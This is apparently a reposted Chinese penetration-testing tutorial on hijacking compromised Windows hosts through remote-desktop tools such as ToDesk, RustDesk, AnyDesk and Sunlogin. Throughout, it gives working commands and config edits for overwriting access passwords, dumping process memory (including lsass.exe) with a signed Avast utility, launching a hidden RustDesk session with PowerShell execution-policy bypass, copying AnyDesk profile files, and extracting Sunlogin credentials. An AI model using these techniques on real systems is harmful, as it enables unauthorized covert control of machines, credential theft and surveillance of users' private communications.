在平时打web或者打内网时难免遇到一种情况,就是需要以当前用户身份,通过远程桌面的形式操控主机。已达到退杀软、操控聊天软件以及其他需要交互式的操作,这个时候就需要借助远程桌面软件来操控目标机。

NO.1 Todesk

根据目标软件安装情况有以下两种利用方法

1.目标机已有完整版todesk。

1)改配置文件。

老版本可替换至本地查看密码(此法在最近更新的几个版本中已经失效),新版本只可更改密码。

改C:\Program Files (x86)\ToDesk下conf.ini文件tempAuthPassEx字段

tga5h42d

b219c2a861e176d319b0a4e0463896d4af2a02ed7bc88da794541701b46f1af2fc4a9864ae00772cc8d924a801bdaaa3b47fbd2fa637ac4b

65tu07zr

11a48a2981bfda260f2f1a890a97b2ed9fcb9b48a262d20e3a68f6c56d6790cd910e1618a7747df448922b0cfe16c284728d28864923d3c8

kill进程重启即可。

2)内存读密码

userInfo.jsondevlist_xx.json文件有userid(连接码)

dump内存,搜索连接码,上下几行会有密码

4.3.3以下临时密码为6位数字

2.目标机无todest,安装官方精简版

dump内存 仅测试4.3.3.0运行精简版(需bypassUAC),dump子进程(主进程为system权限)

AvDump.exe是Avast杀毒软件中自带的一个程序,可用于转储指定进程(lsass.exe)内存数据,它带有Avast杀软数字签名。

AvDump.exe --pid 954 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp

可通过定位被控端版本 4.3.3.0 、主机名、公网ip、系统版本(更准确),来找到相应位置。

*shell快速提取,不一定有效,密码可能在输出的前后两行

设置utf-8

CHCP 65001

1)连接码

shell findstr "20220829" C:\Users\Public\tod.dmp 时间定位

shell findstr "ip地址" C:\Users\Public\tod.dmp ip定位

2)连接密码

主要靠系统版本号定位,具体看连接码定位字符串显示的版本号

shell findstr "19044" C:\Users\Public\tod.dmp

通常为8位数,数字字母混合

NO.2 Rustdesk

单机版,无需绕UAC,但部分软件操作会提示UAC。

配置文件地址

C:\Users\username\AppData\Roaming\RustDesk\config\RustDesk.toml

使用powershell可以无窗口执行

powershell-executionPolicy bypass Start-Process -WindowStyle hidden -FilePath 'C:/user/rust.exe'

第一次运行rustdesk会生成配置文件,然后结束进程

taskkill/f /t /im rust.exe

在配置文件中添加密码,6位数密码

在内网还可配置直连功能RustDesk2.toml

1
2
3
4
[options]
direct-server='Y'
direct-access-port='8443'

NO.3 Anydesk

复制本地C:\Users\guoguang\AppData\Roaming\AnyDesk 下四个文件到远程主机上

删除本地文件,重启开启连接

NO.4 向日葵

自从向日葵12.5版本后,原encry_pwd和fastcode字段已经不在配置文件config.ini和注册表

HKEY_USERS.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo内

解决方案一

根据分析,上述字段移动至C:\ProgramData\Oray\SunloginClient\sys_config.ini中

此配置文件默认需要SYSTEM权限才可以读取

提权后拿到id和加密后的密码,经测试算法没变,通过现有项目解密即可 GitHub - wafinfo/Sunflower_get_Password: 一款针对向日葵的识别码和验证码提取工具

解决方案二

通过dump内存的方式匹配明文字符串获取,参考: https://red.rizhan.icu/?thread-176.htm

id正则为k[0-9]{8,}密码正则为>[a-z0-9]{6},每次刷新后密码的均会保存在内存中

文章转载自:PYkiller

原文链接:https://www.cnblogs.com/pykiller/p/17450239.html

Logo

欢迎加入我们的广州开发者社区,与优秀的开发者共同成长!

更多推荐